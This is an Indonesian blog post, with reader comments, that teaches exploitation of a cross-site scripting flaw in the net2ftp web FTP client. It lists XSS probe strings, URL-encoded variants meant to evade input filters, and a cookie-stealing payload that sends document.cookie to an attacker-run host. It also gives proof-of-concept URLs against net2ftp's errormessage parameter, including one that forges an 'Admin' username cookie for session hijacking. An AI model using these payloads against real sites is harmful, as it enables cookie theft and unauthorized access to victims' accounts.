Cross Site Scripting XSS dan Session Hijacking pada Net2ftp


Abis solat subuh iseng-iseng bangunin si slacky 12.1 lanjutin pelajaran yang iseng-iseng juga🙂 postingan kali ini membahas lagi tentang bugs cross site scripting atau XSS, emang bugs yang satu ini walaupun udah jadul tapi gak ada habisnya web aplikasi yang terkena dampak yang berakibat cookie stealing, deface, de’elel. Pada aplikasi ftp berbasis web yaitu net2ftp dan homepage nya http://www.net2ftp.com.

Bugs ini di temukan oleh Voodoo Research Group yang terdapat pada file includes/registerglobals.inc.php pada baris 1088 s/d 1102 jadi bukan gue yang nemuin, gue masih pemula cuma lagi belajar aja sama master-master researcher security heheh🙂, disini saya akan menjelaskan sedikit bagaimana cara mengeksploitasinya dan anda sendiri tinggal mengembangkannya seperti bugs Cross Site Request Forgery, sembari nulis ini,sekalian minum teh anget pagi-pagi memang nikmat🙂

XSS terjadi karena dalam validasi input yang tidak baik pada form, yang mengakibatkan attacker dapat memasukkan kode jahatnya ke dalam form,

Berikut ini script-script yang bisa kita coba untuk mengecek apakah web aplikasi vulnerable atau tidak ;

<script>alert(“XSS”)</script>
<script\>alert(\’XSS\’)\<\/script\>
<script>javascript:alert(documentt.cookie)</script>
<script>javascript:alert(“XSS”)</script>
“<script>alert()</script>”hati-hati ada xss!
?<script>alert(‘XSS’)</script>

Pada search form ;

[host]/search.php?searchstring=<script>alert(‘XSS’)</script>

Berikut ini script yang di encode untuk mengelabuhi proses input validation ;

[host]/%3cscript%3ealert(‘XSS’)%3c/script%3e
[host]/?%3cscript%3ealert(‘XSS’)%3c/script%3e
%3Cscript%3Ealert(document.cookie)%3C/script%3E

dan 100% encode yang merupakan bentuk lain dari <script>alert(document.cookie)</script>

[host]/?%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d
%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

Mencuri cookie ;

http://korban/page.php?variable=”><script>document.location=’http://www.situsgue.com/cgi-bin/cookie.cgi?’%20+document.cookie</script&gt;

dan masih banyak lagi,,,,

PoC pada Net2Ftp
cek apakah vulnerable ?

http://korban.com/net2ftp/?state=login_small&errormessage=?state=login_small&errormessage=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Jika berhasil akan muncul pop-up seperti di bawah ini ,

xss

Cookie Stealing :
Dengan memanfaatkan XSS bugs, bisa kita gunakan untuk mencuri cookie yang tersimpan di server, setelah kode berhasil di eksekusi maka akan muncul pop-up isi dari cookie yang tersimpan di server,

<script>alert(document.cookie)</script>

lalu di encode menjadi

%3Cscript%3Ealert(document.cookie)%3C/script%3E

Poc :

http://korban.com/net2ftp/?state=login_small&errormessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E

cookie

Session Hijacking

Definisi Session Hijacking yang saya contek mentah-mentah,

“session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim’s computer”

Ibaratnya anda menjatuhkan kunci rumah anda di depan halaman, lalu maling mengambil kunci tersebut dan berhasil masuk karena kunci yang anda jatuhkan, pintu rumah tentunya tidak mengenal siapa saja penghuni rumah itu, tapi pintu tersebut hanya mengenal kunci sebagai otentifikasi,

Sama halnya dengan Web Aplikasi yang menggunakan proses otentifikasi untuk menaungi user yang ada di dalamnya, cookies kita ibaratkan dengan kunci, dan pintu sebagai sistem aplikasinya. bisa di bayangkan cookies di curi pada aplikasi per-bankan atau sistem belanja online.

Setelah cookies yang kita dapatkan dengan cara di atas, seorang attacker mampu untuk mengelabuhi sistem jika cookies menyimpan informasi username dan password dengan meng-injeksi script ke dalam sistem seperti script di bawah ini,

http://korban.com/net2ftp/?state=login_small&errormessage=%3Cscript%3Ejavascript:void(document.cookie=%22net2ftpcoo
kie_username=Admin%22)%3C/script%3E

session hijacking

Sekian, Mohon maaf jika postingan ini gak guna namanya juga newbies😛, silahkan meninggalkan caci dan makiannya🙂

Referensi :
http://research.voodoo-labs.org

17 thoughts on “Cross Site Scripting XSS dan Session Hijacking pada Net2ftp

  1. Ola Mas.. sy tertarik nih mas atas infonya. Saya pake internet Smart, yg dari smart telecom itu. iklannya gencar, tp kok ya pake FileZilla, trus ngakses cPanel, kaga bisa2. klo dr kantor, bisa tuh (internet kantor pake jaringan dedicated). Browsing2, net2ftp katanya FTP diatas HTTP. saya jg kaga ngerti, intinya cm mau upload/download file aja, klo gi make Smart. Kira2… aman ga ya mas, net2ftp nya..
    Trus, ada info ga, klo cPanel diblok ama ISP? Thanx berat atas infonya, mas. kalo ga keberatan, mohon dijapri jg mas jawabannya. web saya itu blum jadi mas, jd masih apa adanya. ths berat mas

    • haha,, yah namanya dagang,, pastinya ngomong yg manis-manis buat dapetin pelanggan,, maksudnya kalo pake netftp itu akses protokol FTP berbasis web pake port 21,, kaya filezilla, bedanya basis pemakaian dimana..

      lebih baik kalo upload/download dari ftp server punya mas,, mending pake FileZilla..

      sama kasusnya, saya pake smart temen,, gak mau masuk2,,kemungkinan ISP melakukan bloking ke port 21 (FTP),,

      solusinya, coba pakai port selain 21,, coba 2121, sebelumnya di konfigurasi juga di cpanel untuk bisa menggunakan port 2121,,

      atau,,

      gunakan web proxy buat akses cpanel :

      http://www.samair.ru/proxy/fresh-proxy-list.htm
      http://www.xroxy.com/proxylist.htm
      http://www.checker.freeproxy.ru/checker/last_checked_proxies.php

      beberapa ISP memang memblok port 21, dan kalo cpanel diblok ISP kayaknya gak mungkin deh,,

      aman dan tidak aman pake smart yang intinya gak ada 100% system yang aman didunia ini,,

      arti dijapri apa ya

  2. Sudah gak zaman merusak-rusak atau membuat deface website seseorang… zaman nya kreatifitas bukan zaman membuat orang tertarik untuk merusak… artikel di blog ini haking semua.. tau neh bener atau gak… kalau tulisan semua orang bisa tulis. tapi kalau ada bukti pasti orang percaya…. ga ada vidoenya…payah neh…

  3. wkakaka,,, gak bisa ngikutin tutor gua yak??? kasian deh loe,,, loe kebiasaan nonton bokep si, jadinya harus ngeliat video mulu baru ngerti,, wkakaka,,,😀

    ==============================================================

    yang peting kreatifitas bung bukan membuat rusak… tutorial tulisan paling juga copy paste atau referensi dari buku,… kalau ada toturial vidoe gw ikutin… jadi wujudkan sebagai pemuda indonesia yang penuh kreatifitas BUKAN MERUSAK!!!!!!!!!!!!!!!!

    • wkakaka,,, bukan maksud menghina deh,, maaf gan,, ini tulisan asli gua,, toh gue kasih referensi kalo ada.😛 kalo tutorial video itu bikin males gan,, kalo mau menangkap maling, berperilakulah seperti maling, itulah maksud dari penyajian artikel di blog ini boy,,

      jadikan pemuda indonesia terdapat dalam dunia IT bukan pemuda yang ,,,,,,,,,,,,zzzzzzzzzzzzz 😀

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s